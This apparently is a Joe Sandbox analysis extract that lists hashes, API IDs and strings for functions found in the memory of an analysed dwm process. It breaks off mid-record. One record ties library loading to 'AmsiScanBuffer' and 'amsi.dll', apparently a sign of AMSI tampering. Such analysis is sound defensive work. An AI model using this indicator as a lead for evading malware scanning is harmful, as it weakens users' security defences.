                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 9aa60eb943e2f4e72505a1797cdc67d03f06eb69ef2f10210b0c05c5a5d744a9
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 8AF09A72305E25C1FB108B24A89C3692330EB8EBA0FD40619DA6A56DF8CF3EC44CC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: db01970521fb033b59d6bc5443d1eb5734d9363d116c5b1d41d560f936bf65f5
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 05D06730A11E24D5FB096B51E85C3582272AB69F81FD40519C50A11AB4DE2E895D8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 622eb5f2ebc59aa044546f7edd328fafd69abcf1a3ad7cc299f0263b7cfaa471
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: EA02B732619B94C6EB60CB55F49835AB7B0F3C5B94F504115EA8E87BA8DB7EC498CF00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: d781f4df8db82cb70bfb938b6b2b3f1ea339c77129f07f6d2036569f5926d4fa
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 42519D36605A61CBE364CB1AE44CA5AB7B4F788B84F90412D9E5A43F58DB3AC94DCB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 62766db23d222312cbeb96b5ee1df96a8003b2e40108b01ffe44f01eecfe9b6d
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 30517C36614A61C7E765CF16B85C61AB3B4F788B84F904129EE4A43FE4DB3AC809DB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: a709c73b784fcf673db131d2593a9ac946a60606ec55f48eb9af392fc15ae458
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 1B517E36215E61C7E768CF16A84C62AB7B4F789B84F90411DDE5A43F58DF3AC949CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                  • Instruction ID: 7dfa6c9e85c0c4888b140fbb648de74f9ae260265bc6173a4237456aa14c59c8
                                                  • Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                  • Instruction Fuzzy Hash: 8361B636129A94C6E661CF55E46C31AB7B4F388B44F904125EA8E43FE8DB7EC558CF02
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 33fc6afa7d09bec4393db9ed6b29d059a80f00464884339cd8ac21188f4fc710
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: D8617436529AA4C6E764CB15E45C31AB7B0F388B44F90511AEA8D47FA8DB7EC548CF04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 5a8a33f1fc3b27cae6a25a7e56a3cb12787dbb5337f85e7f6ad609e52c1d9bac
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 06114236605B60D7FB248B61E40C21A67B0FB49B80F44012ADE8D03BA8EB7EC958C784
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 98374244b62bdb553a9c3eb3e33a32f81a5a450a53db7eab4c3c19d1b102b2b2
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: E351BD36311E20CBEB55CB26E06CB6C77B1E354B89F948130DA4A47BC8DB7AC849C742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: f60a8d4237e72f3f14a3f0197cc33c52391d7b95f627aa1c244f15685a145f4d
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 9C51A032B11E20CAEB54CB2AE44CB6D77B1E354F98F948125DA5A47B8CDB7BC849C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: b3e5fa25f3971d31077366c8ce8cb1e1a0a8029df25090ffa0620304a0efd652
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 6D61CF72508BD4C6EB228F25E45839AB7B0F784B94F444225EB9953BD5CB3DC099CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: cd36518772daa15b1234e2ee8c3629aed24316e6fcc3c5a517f37e1bc8dd3006
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: D3517F32200AA0CBEB768F26E56C35877B1F354B98F944136DA9947FD5CB3AC45AC702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 62750aea86d2f79ab3a62608d88e6549e228e42a9d612b022f297b54e93bc2d6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 64516D72204AA0CAEF74CF22955C36877F0F395B94F984116EA9947FD5CB3AC498CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 81ba7df688118f47c0e8d4d44860644dd30a203473e9d5ec8070b20303da2aaa
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 1561AD73508BC4C1EB248F15E44879AB7B0F785B98F848215EBD817B99DB7DC198CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: b08a352aab7ae306f36862688c8507f6f89dde0ec4132e77021ab274de92b1e7
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: B0517B37200AA0CBEB788F26954C35877B1F354F98F954116DA9A47FD9CB3AC868CB05
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 122660454dcff2f8c64d10645c7e879e14b86cb446b59d18540bbce88dfbed65
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: B9115C31310FA1D2EB119B65A83E35A62B4B744780FC45035DA49C3AD5EF6AC90DC701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 6c9896909d5ae9cb90d3718a33db1c4fc3b0fc1a6f8ca8a51580f751010b5df6
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 31115131314FA1E6FB109B25E84C35E66B4F788B80FD44525AE4993E98EF6AC94DC740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 1b663cde0360d8c8db26766d203b6d56f14f2cde6653c6efc1e54205759498c7
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: AED1DD32714AA0C9E711CFA9E4482DC3BB5F355B98F80422ACE5EA7FD9DA35D40AC741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 49083cc7c75cdff89d7c6d43a0d48fc578fdb3828b1aa5443f4b46fa426b515f
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 8FD1BC32B14AA4C9F711CFA9D4482DC37B1F358B98F94421ADE5EA7F99DA36C14AC340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
